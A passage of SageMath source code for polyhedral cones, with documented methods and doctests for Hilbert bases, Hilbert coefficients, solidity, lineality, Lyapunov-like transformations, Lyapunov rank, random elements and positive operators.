M( 3, -5, 1, 1),
M( 6, -5, 0, 1),
M( 3, -13, 5, 2),
M( 2, -6, 2, 1),
M( 5, -6, 1, 1),
M( 8, -6, 0, 1),
M( 0, 1, 0, 0),
M(-2, 8, 0, -1),
M(10, -42, 17, 6),
M( 7, -28, 11, 4),
M( 5, -21, 9, 3),
M( 6, -21, 8, 3),
M( 5, -14, 5, 2),
M( 2, -7, 3, 1),
M( 4, -7, 2, 1),
M( 7, -7, 1, 1),
M( 0, 0, 1, 0),
M( 1, 0, 0, 0),
M(-1, 7, 0, -1),
M(-3, 14, 0, -2)
in 4-d lattice M
Not a strictly convex cone::
sage: wedge = Cone([ (1,0,0), (1,2,0), (0,0,1), (0,0,-1) ])
sage: sorted(wedge.semigroup_generators())
[N(0, 0, -1), N(0, 0, 1), N(1, 0, 0), N(1, 1, 0), N(1, 2, 0)]
sage: wedge.Hilbert_basis()
N(1, 2, 0),
N(1, 0, 0),
N(0, 0, 1),
N(0, 0, -1),
N(1, 1, 0)
in 3-d lattice N
Cones that are not full-dimensional are OK, too (see :trac:`11312`)::
sage: Cone([(1,1,0), (-1,1,0)]).Hilbert_basis()
N( 1, 1, 0),
N(-1, 1, 0),
N( 0, 1, 0)
in 3-d lattice N
ALGORITHM:
The primal Normaliz algorithm, see [Normaliz]_.
"""
if self.is_strictly_convex():
def not_in_linear_subspace(x):
return True
else:
linear_subspace = self.linear_subspace()
def not_in_linear_subspace(x):
# "x in linear_subspace" does not work, due to absence
# of coercion maps as of Trac ticket #10513.
try:
linear_subspace(x)
return False
except (TypeError, ValueError):
return True
irreducible = list(self.rays()) # these are irreducible for sure
gens = list(self.semigroup_generators())
for x in irreducible:
try:
gens.remove(x)
except ValueError:
pass
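# Greedy reduction: a candidate x is reducible exactly when x - y still
# lies in the cone for some other generator y outside the linear
# subspace; reducible candidates are dropped, the remaining ones are
# irreducible and kept.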
while gens:
x = gens.pop()
if any(not_in_linear_subspace(y) and x-y in self
for y in irreducible+gens):
continue
irreducible.append(x)
if len(irreducible) == self.nrays():
return self.rays()
else:
return PointCollection(irreducible, self.lattice())
def Hilbert_coefficients(self, point, solver=None, verbose=0,
*, integrality_tolerance=1e-3):
r"""
Return the expansion coefficients of ``point`` with respect to
:meth:`Hilbert_basis`.
INPUT:
- ``point`` -- a :meth:`~IntegralRayCollection.lattice` point
in the cone, or something that can be converted to a
point. For example, a list or tuple of integers.
- ``solver`` -- (default: ``None``) Specify a Mixed Integer Linear Programming
(MILP) solver to be used. If set to ``None``, the default one is used. For
more information on MILP solvers and which default solver is used, see
the method
:meth:`solve <sage.numerical.mip.MixedIntegerLinearProgram.solve>`
of the class
:class:`MixedIntegerLinearProgram <sage.numerical.mip.MixedIntegerLinearProgram>`.
- ``verbose`` -- integer (default: ``0``). Sets the level of verbosity
of the LP solver. Set to 0 by default, which means quiet.
- ``integrality_tolerance`` -- parameter for use with MILP solvers over an
inexact base ring; see :meth:`MixedIntegerLinearProgram.get_values`.
OUTPUT:
A `\ZZ`-vector of length ``len(self.Hilbert_basis())`` with nonnegative
components.
.. note::
Since the Hilbert basis elements are not necessarily linearly
independent, the expansion coefficients are not unique. However,
this method will always return the same expansion coefficients when
invoked with the same argument.
EXAMPLES::
sage: cone = Cone([(1,0),(0,1)])
sage: cone.rays()
N(1, 0),
N(0, 1)
in 2-d lattice N
sage: cone.Hilbert_coefficients([3,2])
(3, 2)
A more complicated example::
sage: N = ToricLattice(2)
sage: cone = Cone([N(1,0),N(1,2)])
sage: cone.Hilbert_basis()
N(1, 0),
N(1, 2),
N(1, 1)
in 2-d lattice N
sage: cone.Hilbert_coefficients( N(1,1) )
(0, 0, 1)
The cone need not be strictly convex::
sage: N = ToricLattice(3)
sage: cone = Cone([N(1,0,0),N(1,2,0),N(0,0,1),N(0,0,-1)])
sage: cone.Hilbert_basis()
N(1, 2, 0),
N(1, 0, 0),
N(0, 0, 1),
N(0, 0, -1),
N(1, 1, 0)
in 3-d lattice N
sage: cone.Hilbert_coefficients( N(1,1,3) )
(0, 0, 3, 0, 1)
"""
point = self.lattice()(point)
if point not in self:
raise ValueError('The given point is not in the cone!')
basis = self.Hilbert_basis()
from sage.numerical.mip import MixedIntegerLinearProgram
p = MixedIntegerLinearProgram(maximization=False, solver=solver)
p.set_objective(None)
x = p.new_variable(integer=True, nonnegative=True)
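# Integer feasibility problem: find nonnegative integers x_j with
# sum_j x_j * basis[j] == point, one linear constraint per ambient
# coordinate; any feasible solution yields valid expansion coefficients.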
for i in range(self.lattice_dim()):
p.add_constraint(p.sum(b[i]*x[j] for j,b in enumerate(basis)) == point[i])
p.solve(log=verbose)
return vector(ZZ, p.get_values(x, convert=ZZ, tolerance=integrality_tolerance))
def is_solid(self):
r"""
Check if this cone is solid.
A cone is said to be solid if it has nonempty interior. That
is, if its extreme rays span the entire ambient space.
An alias is :meth:`is_full_dimensional`.
OUTPUT:
``True`` if this cone is solid, and ``False`` otherwise.
.. SEEALSO::
:meth:`is_proper`
EXAMPLES:
The nonnegative orthant is always solid::
sage: quadrant = cones.nonnegative_orthant(2)
sage: quadrant.is_solid()
True
sage: octant = Cone([(1,0,0), (0,1,0), (0,0,1)])
sage: octant.is_solid()
True
However, if we embed the two-dimensional nonnegative quadrant
into three-dimensional space, then the resulting cone no longer
has interior, so it is not solid::
sage: quadrant = Cone([(1,0,0), (0,1,0)])
sage: quadrant.is_solid()
False
TESTS:
A closed convex cone is solid if and only if its dual is
strictly convex::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim = 8)
sage: K.is_solid() == K.dual().is_strictly_convex()
True
"""
return (self.dim() == self.lattice_dim())
is_full_dimensional = is_solid
def is_proper(self):
r"""
Check if this cone is proper.
A cone is said to be proper if it is closed, convex, solid,
and contains no lines. This cone is assumed to be closed and
convex; therefore it is proper if it is solid and contains no
lines.
OUTPUT:
``True`` if this cone is proper, and ``False`` otherwise.
.. SEEALSO::
:meth:`is_strictly_convex`, :meth:`is_solid`
EXAMPLES:
The nonnegative orthant is always proper::
sage: quadrant = cones.nonnegative_orthant(2)
sage: quadrant.is_proper()
True
sage: octant = Cone([(1,0,0), (0,1,0), (0,0,1)])
sage: octant.is_proper()
True
However, if we embed the two-dimensional nonnegative quadrant
into three-dimensional space, then the resulting cone no longer
has interior, so it is not solid, and thus not proper::
sage: quadrant = Cone([(1,0,0), (0,1,0)])
sage: quadrant.is_proper()
False
Likewise, a half-space contains at least one line, so it is not
proper::
sage: halfspace = Cone([(1,0),(0,1),(-1,0)])
sage: halfspace.is_proper()
False
"""
return (self.is_strictly_convex() and self.is_solid())
def is_full_space(self):
r"""
Check if this cone is equal to its ambient vector space.
An alias is :meth:`is_universe`.
OUTPUT:
``True`` if this cone equals its entire ambient vector
space and ``False`` otherwise.
EXAMPLES:
A single ray in two dimensions is not equal to the entire
space::
sage: K = Cone([(1,0)])
sage: K.is_full_space()
False
Neither is the nonnegative orthant::
sage: K = cones.nonnegative_orthant(2)
sage: K.is_full_space()
False
The right half-space contains a vector subspace, but it is
still not equal to the entire space::
sage: K = Cone([(1,0),(-1,0),(0,1)])
sage: K.is_full_space()
False
However, if we allow conic combinations of both axes, then
the resulting cone is the entire two-dimensional space::
sage: K = Cone([(1,0),(-1,0),(0,1),(0,-1)])
sage: K.is_full_space()
True
"""
return self.linear_subspace() == self.lattice().vector_space()
is_universe = is_full_space
def lineality(self):
r"""
Return the lineality of this cone.
The lineality of a cone is the dimension of the largest linear
subspace contained in that cone.
OUTPUT:
A nonnegative integer; the dimension of the largest subspace
contained within this cone.
REFERENCES:
- [Roc1970]_
EXAMPLES:
The lineality of the nonnegative orthant is zero, since it clearly
contains no lines::
sage: K = cones.nonnegative_orthant(3)
sage: K.lineality()
0
However, if we add another ray so that the entire `x`-axis belongs
to the cone, then the resulting cone will have lineality one::
sage: K = Cone([(1,0,0), (-1,0,0), (0,1,0), (0,0,1)])
sage: K.lineality()
1
If our cone is all of `\mathbb{R}^{2}`, then its lineality is equal
to the dimension of the ambient space (i.e. two)::
sage: K = Cone([(1,0), (-1,0), (0,1), (0,-1)])
sage: K.is_full_space()
True
sage: K.lineality()
2
sage: K.lattice_dim()
2
Per the definition, the lineality of the trivial cone in a trivial
space is zero::
sage: K = cones.trivial(0)
sage: K.lineality()
0
TESTS:
The lineality of a cone should be an integer between zero and the
dimension of the ambient space, inclusive::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim = 8)
sage: l = K.lineality()
sage: l in ZZ
True
sage: 0 <= l <= K.lattice_dim()
True
A strictly convex cone should have lineality zero::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim = 8, strictly_convex = True)
sage: K.lineality()
0
"""
return self.linear_subspace().dimension()
def is_relatively_open(self):
r"""
Return whether ``self`` is relatively open.
OUTPUT:
Boolean.
EXAMPLES::
sage: K = cones.nonnegative_orthant(3)
sage: K.is_relatively_open()
False
sage: K1 = Cone([(1,0), (-1,0)]); K1
1-d cone in 2-d lattice N
sage: K1.is_relatively_open()
True
"""
return self.lineality() == self.dim()
@cached_method
def discrete_complementarity_set(self):
r"""
Compute a discrete complementarity set of this cone.
A discrete complementarity set of a cone is the set of all
orthogonal pairs `(x,s)` where `x` is in some fixed generating
set of the cone, and `s` is in some fixed generating set of its
dual. The generators chosen for this cone and its dual are
simply their :meth:`~IntegralRayCollection.rays`.
OUTPUT:
A tuple of pairs `(x,s)` such that,
* `x` and `s` are nonzero.
* `s(x)` is zero.
* `x` is one of this cone's :meth:`~IntegralRayCollection.rays`.
* `s` is one of the :meth:`~IntegralRayCollection.rays` of this
cone's :meth:`dual`.
REFERENCES:
- [Or2017]_
EXAMPLES:
Pairs of standard basis elements form a discrete complementarity
set for the nonnegative orthant::
sage: K = cones.nonnegative_orthant(2)
sage: K.discrete_complementarity_set()
((N(1, 0), M(0, 1)), (N(0, 1), M(1, 0)))
If a cone consists of a single ray, then the second components
of a discrete complementarity set for that cone should generate
the orthogonal complement of the ray::
sage: K = Cone([(1,0)])
sage: K.discrete_complementarity_set()
((N(1, 0), M(0, 1)), (N(1, 0), M(0, -1)))
sage: K = Cone([(1,0,0)])
sage: K.discrete_complementarity_set()
((N(1, 0, 0), M(0, 1, 0)),
(N(1, 0, 0), M(0, -1, 0)),
(N(1, 0, 0), M(0, 0, 1)),
(N(1, 0, 0), M(0, 0, -1)))
When a cone is the entire space, its dual is the trivial cone,
so the only discrete complementarity set for it is empty::
sage: K = Cone([(1,0),(-1,0),(0,1),(0,-1)])
sage: K.is_full_space()
True
sage: K.discrete_complementarity_set()
()
Likewise for trivial cones, whose duals are the entire space::
sage: cones.trivial(0).discrete_complementarity_set()
()
TESTS:
A discrete complementarity set for the dual can be obtained by
switching components in a discrete complementarity set of the
original cone::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6)
sage: dcs_dual = K.dual().discrete_complementarity_set()
sage: expected = tuple( (x,s) for (s,x) in dcs_dual )
sage: actual = K.discrete_complementarity_set()
sage: sorted(actual) == sorted(expected)
True
The pairs in a discrete complementarity set are in fact
complementary::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6)
sage: dcs = K.discrete_complementarity_set()
sage: sum( (s*x).abs() for (x,s) in dcs )
0
"""
# Return an immutable tuple instead of a mutable list because
# the result will be cached.
return tuple( (x,s) for x in self
for s in self.dual()
if s*x == 0 )
def lyapunov_like_basis(self):
r"""
Compute a basis of Lyapunov-like transformations on this cone.
A linear transformation `L` is said to be Lyapunov-like on this
cone if `L(x)` and `s` are orthogonal for every pair `(x,s)` in
its :meth:`discrete_complementarity_set`. The set of all such
transformations forms a vector space, namely the Lie algebra of
the automorphism group of this cone.
OUTPUT:
A list of matrices forming a basis for the space of all
Lyapunov-like transformations on this cone.
.. SEEALSO::
:meth:`cross_positive_operators_gens`,
:meth:`positive_operators_gens`,
:meth:`Z_operators_gens`
REFERENCES:
- [Or2017]_
- [RNPA2011]_
EXAMPLES:
Every transformation is Lyapunov-like on the trivial cone::
sage: K = cones.trivial(2)
sage: M = MatrixSpace(K.lattice().base_field(), K.lattice_dim())
sage: list(M.basis()) == K.lyapunov_like_basis()
True
And by duality, every transformation is Lyapunov-like on the
ambient space::
sage: K = Cone([(1,0), (-1,0), (0,1), (0,-1)])
sage: K.is_full_space()
True
sage: M = MatrixSpace(K.lattice().base_field(), K.lattice_dim())
sage: list(M.basis()) == K.lyapunov_like_basis()
True
However, in a trivial space there are no nonzero linear maps, so
the Lyapunov-like basis is empty::
sage: K = cones.trivial(0)
sage: K.lyapunov_like_basis()
[]
The Lyapunov-like transformations on the nonnegative orthant are
diagonal matrices::
sage: K = cones.nonnegative_orthant(1)
sage: K.lyapunov_like_basis()
[[1]]
sage: K = cones.nonnegative_orthant(2)
sage: K.lyapunov_like_basis()
[
[1 0] [0 0]
[0 0], [0 1]
]
sage: K = cones.nonnegative_orthant(3)
sage: K.lyapunov_like_basis()
[
[1 0 0] [0 0 0] [0 0 0]
[0 0 0] [0 1 0] [0 0 0]
[0 0 0], [0 0 0], [0 0 1]
]
Only the identity matrix is Lyapunov-like on the pyramids
defined by the one- and infinity-norms [RNPA2011]_::
sage: l31 = Cone([(1,0,1), (0,-1,1), (-1,0,1), (0,1,1)])
sage: l31.lyapunov_like_basis()
[
[1 0 0]
[0 1 0]
[0 0 1]
]
sage: l3infty = Cone([(0,1,1), (1,0,1), (0,-1,1), (-1,0,1)])
sage: l3infty.lyapunov_like_basis()
[
[1 0 0]
[0 1 0]
[0 0 1]
]
TESTS:
Every operator in a :meth:`lyapunov_like_basis` is Lyapunov-like
on the cone::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: LL = K.lyapunov_like_basis()
sage: all( L.is_lyapunov_like_on(K) for L in LL )
True
The Lyapunov-like transformations on a cone and its dual are
transposes of one another. However, there's no reason to expect
that one basis will consist of transposes of the other::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: LL1 = K.lyapunov_like_basis()
sage: LL2 = (L.transpose() for L in K.dual().lyapunov_like_basis())
sage: V = VectorSpace(K.lattice().base_field(), K.lattice_dim()^2)
sage: LL1_vecs = ( V(m.list()) for m in LL1 )
sage: LL2_vecs = ( V(m.list()) for m in LL2 )
sage: V.span(LL1_vecs) == V.span(LL2_vecs)
True
The space of all Lyapunov-like transformations is a Lie algebra
and should therefore be closed under the Lie bracket::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=4)
sage: LL = K.lyapunov_like_basis()
sage: W = VectorSpace(K.lattice().base_field(), K.lattice_dim()**2)
sage: LL_W = W.span( W(m.list()) for m in LL )
sage: brackets = ( W((L1*L2 - L2*L1).list()) for L1 in LL
....: for L2 in LL )
sage: all( b in LL_W for b in brackets )
True
"""
# Matrices are not vectors in Sage, so we have to convert them
# to vectors explicitly before we can find a basis. We need these
# two values to construct the appropriate "long vector" space.
F = self.lattice().base_field()
n = self.lattice_dim()
# These tensor products contain a basis for the orthogonal
# complement of the Lyapunov-like transformations on this cone.
tensor_products = ( s.tensor_product(x)
for (x,s) in self.discrete_complementarity_set() )
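# For vectors x, s we have <L(x), s> = sum_{i,j} L[i,j]*s[i]*x[j], the
# Frobenius pairing of L with the outer product s tensor x.  Hence L is
# Lyapunov-like precisely when its "long vector" is orthogonal to the
# long vectors of these tensor products.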
# Convert those tensor products to long vectors.
W = VectorSpace(F, n**2)
perp_vectors = ( W(tp.list()) for tp in tensor_products )
# Now find the Lyapunov-like transformations (as long vectors).
LL_vectors = W.span(perp_vectors).complement()
# And finally convert the long vectors back to matrices.
M = MatrixSpace(F, n, n)
return [ M(v.list()) for v in LL_vectors.basis() ]
def lyapunov_rank(self):
r"""
Compute the Lyapunov rank of this cone.
The Lyapunov rank of a cone is the dimension of the space of its
Lyapunov-like transformations --- that is, the length of a
:meth:`lyapunov_like_basis`. Equivalently, the Lyapunov rank is
the dimension of the Lie algebra of the automorphism group of
the cone.
OUTPUT:
A nonnegative integer representing the Lyapunov rank of this cone.
If the ambient space is trivial, then the Lyapunov rank will be
zero. On the other hand, if the dimension of the ambient vector
space is `n > 0`, then the resulting Lyapunov rank will be
between `1` and `n^2` inclusive. If this cone :meth:`is_proper`,
then that upper bound reduces from `n^2` to `n`. A Lyapunov rank
of `n-1` is not possible (by Lemma 6 [Or2017]_) in either case.
ALGORITHM:
Algorithm 3 [Or2017]_ is used. Every closed convex cone is
isomorphic to a Cartesian product of a proper cone, a subspace,
and a trivial cone. The Lyapunov ranks of the subspace and
trivial cone are easy to compute. Essentially, we "peel off"
those easy parts of the cone and compute their Lyapunov ranks
separately. We then compute the rank of the proper cone by
counting a :meth:`lyapunov_like_basis` for it. Summing the
individual ranks gives the Lyapunov rank of the original cone.
REFERENCES:
- [GT2014]_
- [Or2017]_
- [RNPA2011]_
EXAMPLES:
The Lyapunov rank of the nonnegative orthant is the same as the
dimension of the ambient space [RNPA2011]_::
sage: positives = cones.nonnegative_orthant(1)
sage: positives.lyapunov_rank()
1
sage: quadrant = cones.nonnegative_orthant(2)
sage: quadrant.lyapunov_rank()
2
sage: octant = cones.nonnegative_orthant(3)
sage: octant.lyapunov_rank()
3
A vector space of dimension `n` has Lyapunov rank `n^{2}`
[Or2017]_::
sage: Q5 = VectorSpace(QQ, 5)
sage: gs = Q5.basis() + [ -r for r in Q5.basis() ]
sage: K = Cone(gs)
sage: K.lyapunov_rank()
25
A pyramid in three dimensions has Lyapunov rank one [RNPA2011]_::
sage: l31 = Cone([(1,0,1), (0,-1,1), (-1,0,1), (0,1,1)])
sage: l31.lyapunov_rank()
1
sage: l3infty = Cone([(0,1,1), (1,0,1), (0,-1,1), (-1,0,1)])
sage: l3infty.lyapunov_rank()
1
A ray in `n` dimensions has Lyapunov rank `n^{2} - n + 1`
[Or2017]_::
sage: K = Cone([(1,0,0,0,0)])
sage: K.lyapunov_rank()
21
sage: K.lattice_dim()**2 - K.lattice_dim() + 1
21
A subspace of dimension `m` in an `n`-dimensional ambient space
has Lyapunov rank `n^{2} - m(n - m)` [Or2017]_::
sage: e1 = vector(QQ, [1,0,0,0,0])
sage: e2 = vector(QQ, [0,1,0,0,0])
sage: z = (0,0,0,0,0)
sage: K = Cone([e1, -e1, e2, -e2, z, z, z])
sage: K.lyapunov_rank()
19
sage: K.lattice_dim()**2 - K.dim()*K.codim()
19
Lyapunov rank is additive on a product of proper cones [RNPA2011]_::
sage: l31 = Cone([(1,0,1), (0,-1,1), (-1,0,1), (0,1,1)])
sage: octant = Cone([(1,0,0), (0,1,0), (0,0,1)])
sage: K = l31.cartesian_product(octant)
sage: K.lyapunov_rank()
4
sage: l31.lyapunov_rank() + octant.lyapunov_rank()
4
Two linearly-isomorphic cones have the same Lyapunov rank
[RNPA2011]_. A cone linearly-isomorphic to the nonnegative octant
will have Lyapunov rank ``3``::
sage: K = Cone([(1,2,3), (-1,1,0), (1,0,6)])
sage: K.lyapunov_rank()
3
Lyapunov rank is invariant under :meth:`dual` [RNPA2011]_::
sage: K = Cone([(2,2,4), (-1,9,0), (2,0,6)])
sage: K.lyapunov_rank() == K.dual().lyapunov_rank()
True
TESTS:
Lyapunov rank should be additive on a product of proper cones
[RNPA2011]_::
sage: set_random_seed()
sage: K1 = random_cone(max_ambient_dim=6,
....: strictly_convex=True,
....: solid=True)
sage: K2 = random_cone(max_ambient_dim=6,
....: strictly_convex=True,
....: solid=True)
sage: K = K1.cartesian_product(K2)
sage: K.lyapunov_rank() == K1.lyapunov_rank() + K2.lyapunov_rank()
True
Lyapunov rank should be invariant under a linear isomorphism
[Or2017]_::
sage: set_random_seed()
sage: K1 = random_cone(max_ambient_dim=8)
sage: n = K1.lattice_dim()
sage: A = random_matrix(QQ, n, algorithm='unimodular')
sage: K2 = Cone( ( A*r for r in K1 ), lattice=K1.lattice())
sage: K1.lyapunov_rank() == K2.lyapunov_rank()
True
Lyapunov rank should be invariant under :meth:`dual` [RNPA2011]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: K.lyapunov_rank() == K.dual().lyapunov_rank()
True
The Lyapunov rank of a proper polyhedral cone in a non-trivial
`n`-dimensional space can be any number between `1` and `n`
inclusive, excluding `n-1` [GT2014]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8,
....: min_rays=1,
....: strictly_convex=True,
....: solid=True)
sage: b = K.lyapunov_rank()
sage: n = K.lattice_dim()
sage: 1 <= b <= n
True
sage: b == n-1
False
No polyhedral closed convex cone in `n` dimensions has Lyapunov
rank `n-1` [Or2017]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: K.lyapunov_rank() == K.lattice_dim() - 1
False
The calculation of the Lyapunov rank of an improper cone can
be reduced to that of a proper cone [Or2017]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: K_SP = K.solid_restriction().strict_quotient()
sage: l = K.lineality()
sage: c = K.codim()
sage: actual = K.lyapunov_rank()
sage: expected = K_SP.lyapunov_rank() + K.dim()*(l + c) + c**2
sage: actual == expected
True
The Lyapunov rank of a cone is the length of a
:meth:`lyapunov_like_basis` for it::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: K.lyapunov_rank() == len(K.lyapunov_like_basis())
True
A "perfect" cone has Lyapunov rank `n` or more in `n`
dimensions. We can make any cone perfect by adding a slack
variable::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: L = ToricLattice(K.lattice_dim() + 1)
sage: K = Cone([ r.list() + [0] for r in K ], lattice=L)
sage: K.lyapunov_rank() >= K.lattice_dim()
True
"""
# The solid_restriction() and strict_quotient() methods
# already check if the cone is solid or strictly convex, so we
# can't save any additional time here by seeing if those
# methods would be no-ops.
#
# The call to solid_restriction() restricts K to its own span,
# resulting in the cone K_S from the paper. The call to
# strict_quotient() then restricts K_S to the span of its dual.
K_SP = self.solid_restriction().strict_quotient()
# K_SP is proper, so we have to compute its Lyapunov rank the
# hard way -- by counting a Lyapunov-like basis for it.
m = self.dim()
n = self.lattice_dim()
l = self.lineality()
# cf. Theorem 2
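# (Equivalently, writing c = n - m for the codimension:
# l*m + (n - m)*n == m*(l + c) + c**2, which is the form used in the
# TESTS block of the docstring above.)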
return len(K_SP.lyapunov_like_basis()) + l*m + (n - m)*n
def random_element(self, ring=ZZ):
r"""
Return a random element of this cone.
All elements of a convex cone can be represented as a
nonnegative linear combination of its generators. A random
element is thus constructed by assigning random nonnegative
weights to the generators of this cone. By default, these
weights are integral and the resulting random element will live
in the same lattice as the cone.
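For example (an illustrative, hand-picked combination rather than an
actual random draw), weighting the two generating rays of the
nonnegative quadrant by `2` and `3` yields an element of the cone::
sage: K = cones.nonnegative_orthant(2)
sage: x = 2*K.ray(0) + 3*K.ray(1)
sage: K.contains(x)
True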
The random nonnegative weights are chosen from ``ring`` which
defaults to ``ZZ``. When ``ring`` is not ``ZZ``, the random
element returned will be a vector. Only the rings ``ZZ`` and
``QQ`` are currently supported.
INPUT:
- ``ring`` -- (default: ``ZZ``) the ring from which the random
generator weights are chosen; either ``ZZ`` or ``QQ``.
OUTPUT:
Either a lattice element or vector contained in both this cone
and its ambient vector space. If ``ring`` is ``ZZ``, a lattice
element is returned; otherwise a vector is returned. If ``ring``
is neither ``ZZ`` nor ``QQ``, then a ``NotImplementedError`` is
raised.
EXAMPLES:
The trivial element ``()`` is always returned in a trivial space::
sage: set_random_seed()
sage: K = cones.trivial(0)
sage: K.random_element()
N()
sage: K.random_element(ring=QQ)
()
A random element of the trivial cone in a nontrivial space is zero::
sage: set_random_seed()
sage: K = cones.trivial(3)
sage: K.random_element()
N(0, 0, 0)
sage: K.random_element(ring=QQ)
(0, 0, 0)
A random element of the nonnegative orthant should have all
components nonnegative::
sage: set_random_seed()
sage: K = cones.nonnegative_orthant(3)
sage: all( x >= 0 for x in K.random_element() )
True
sage: all( x >= 0 for x in K.random_element(ring=QQ) )
True
If ``ring`` is not ``ZZ`` or ``QQ``, an error is raised::
sage: set_random_seed()
sage: K = Cone([(1,0),(0,1)])
sage: K.random_element(ring=RR)
Traceback (most recent call last):
...
NotImplementedError: ring must be either ZZ or QQ.
TESTS:
Any cone should contain a random element of itself::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: K.contains(K.random_element())
True
sage: K.contains(K.random_element(ring=QQ))
True
The ambient vector space of the cone should contain a random
element of the cone::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: K.random_element() in K.lattice().vector_space()
True
sage: K.random_element(ring=QQ) in K.lattice().vector_space()
True
By default, the random element should live in this cone's lattice::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: K.random_element() in K.lattice()
True
A strictly convex cone contains no lines, and thus no negative
multiples of any of its elements besides zero::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8, strictly_convex=True)
sage: x = K.random_element()
sage: x.is_zero() or not K.contains(-x)
True
The sum of random elements of a cone lies in the cone::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: K.contains(sum(K.random_element() for i in range(10)))
True
sage: K.contains(sum(K.random_element(QQ) for i in range(10)))
True
The sum of random elements of a cone belongs to its ambient
vector space::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: V = K.lattice().vector_space()
sage: sum(K.random_element() for i in range(10)) in V
True
sage: sum(K.random_element(ring=QQ) for i in range(10)) in V
True
By default, the sum of random elements of the cone should live
in the cone's lattice::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: sum(K.random_element() for i in range(10)) in K.lattice()
True
"""
if ring not in [ZZ, QQ]:
# This cone theoretically lives in a real vector space,
# but in Sage, we work over the rationals to avoid
# numerical issues. Thus ``ring`` must consist of
# rationals so that the ambient vector space will contain
# the resulting random element.
raise NotImplementedError('ring must be either ZZ or QQ.')
# The lattice or vector space in which the return value will live.
L = self.lattice()
if ring is not ZZ:
L = L.vector_space()
# Scale each generator by a random nonnegative factor.
terms = ( ring.random_element().abs()*L(g) for g in self )
# Make sure we return a lattice element or vector. Without the
# explicit conversion, we return ``0`` when we have no rays.
return L(sum(terms))
def positive_operators_gens(self, K2=None):
r"""
Compute minimal generators of the positive operators on this cone.
A linear operator on a cone is positive if the image of
the cone under the operator is a subset of the cone. This
concept can be extended to two cones: the image of the
first cone under a positive operator is a subset of the
second cone, which may live in a different space.
The positive operators (on one or two fixed cones) themselves
form a closed convex cone. This method computes and returns
the generators of that cone as a list of matrices.
INPUT:
- ``K2`` -- (default: ``self``) the codomain cone; the image of
this cone under the returned generators is a subset of ``K2``.
OUTPUT:
A list of `m`-by-`n` matrices where `m` is the ambient dimension
of ``K2`` and `n` is the ambient dimension of this cone. Each
matrix `P` in the list has the property that `P(x)` is an
element of ``K2`` whenever `x` is an element of this cone.
The returned matrices generate the cone of positive operators
from this cone to ``K2``; that is,
- Any nonnegative linear combination of the returned matrices
sends elements of this cone to ``K2``.
- Every positive operator on this cone (with respect to ``K2``)
is some nonnegative linear combination of the returned matrices.
ALGORITHM:
Computing positive operators directly is difficult, but
computing their dual is straightforward using the generators of
Berman and Gaiha. We construct the dual of the positive
operators, and then return the dual of that, which is guaranteed
to be the desired positive operators because everything is
closed, convex, and polyhedral.
.. SEEALSO::
:meth:`cross_positive_operators_gens`,
:meth:`lyapunov_like_basis`,
:meth:`Z_operators_gens`
REFERENCES:
- [BG1972]_
- [BP1994]_
- [Or2018b]_
EXAMPLES:
Positive operators on the nonnegative orthant are nonnegative
matrices::
sage: K = Cone([(1,)])
sage: K.positive_operators_gens()
[[1]]
sage: K = Cone([(1,0),(0,1)])
sage: K.positive_operators_gens()
[
[1 0] [0 1] [0 0] [0 0]
[0 0], [0 0], [1 0], [0 1]
]
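A nonnegative combination of these generators therefore maps the
quadrant into itself; for instance (an illustrative, hand-picked
check, not taken from the references)::
sage: K = Cone([(1,0),(0,1)])
sage: P = matrix(QQ, [[1,2],[3,4]]) # a nonnegative combination of the generators
sage: K.contains(P*vector(QQ, [1,2]))
True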
The trivial cone in a trivial space has no positive operators::
sage: K = cones.trivial(0)
sage: K.positive_operators_gens()
[]
Every operator is positive on the trivial cone::
sage: K = cones.trivial(1)
sage: K.positive_operators_gens()
[[1], [-1]]
sage: K = cones.trivial(2)
sage: K.is_trivial()
True
sage: K.positive_operators_gens()
[
[1 0] [-1 0] [0 1] [ 0 -1] [0 0] [ 0 0] [0 0] [ 0 0]
[0 0], [ 0 0], [0 0], [ 0 0], [1 0], [-1 0], [0 1], [ 0 -1]
]
Every operator is positive on the ambient vector space::
sage: K = Cone([(1,),(-1,)])
sage: K.is_full_space()
True
sage: K.positive_operators_gens()
[[1], [-1]]
sage: K = Cone([(1,0),(-1,0),(0,1),(0,-1)])
sage: K.is_full_space()
True
sage: K.positive_operators_gens()
[
[1 0] [-1 0] [0 1] [ 0 -1] [0 0] [ 0 0] [0 0] [ 0 0]
[0 0], [ 0 0], [0 0], [ 0 0], [1 0], [-1 0], [0 1], [ 0 -1]
]
A non-obvious application is to find the positive operators on the
right half-plane [Or2018b]_::
sage: K = Cone([(1,0),(0,1),(0,-1)])
sage: K.positive_operators_gens()
[
[1 0] [0 0] [ 0 0] [0 0] [ 0 0]
[0 0], [1 0], [-1 0], [0 1], [ 0 -1]
]
TESTS:
A random positive operator should send a random element of one
cone into the other cone::
sage: set_random_seed()
sage: K1 = random_cone(max_ambient_dim=3)
sage: K2 = random_cone(max_ambient_dim=3)
sage: pi_gens = K1.positive_operators_gens(K2)
sage: L = ToricLattice(K1.lattice_dim() * K2.lattice_dim())
sage: pi_cone = Cone(( g.list() for g in pi_gens ),
....: lattice=L,
....: check=False)
sage: P = matrix(K2.lattice_dim(),
....: K1.lattice_dim(),
....: pi_cone.random_element(QQ).list())
